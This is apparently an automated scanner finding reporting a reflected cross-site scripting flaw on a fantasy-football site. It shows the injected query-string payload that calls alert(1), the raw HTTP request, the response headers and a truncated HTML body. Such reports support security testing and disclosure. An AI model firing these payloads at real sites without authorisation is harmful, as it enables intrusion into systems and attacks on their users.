1. Cross-site scripting (reflected)
Severity: High
Confidence: Certain
Host: http://fantasyfootball
Path: /
GET /?5646c"-alert(1)-
Host: fantasyfootball.fanhouse
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 08:52:12 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=1000000
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 65589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR
<html xmlns="http://www.w3.org
<head>
<meta http-equiv
...[SNIP]...
.com,mmafighting.net
s_265.mmxgo = true;
s_265.prop1="Fantasy Football";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http:/
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commen
var s_code=s_265.t();if(s
...[SNIP]...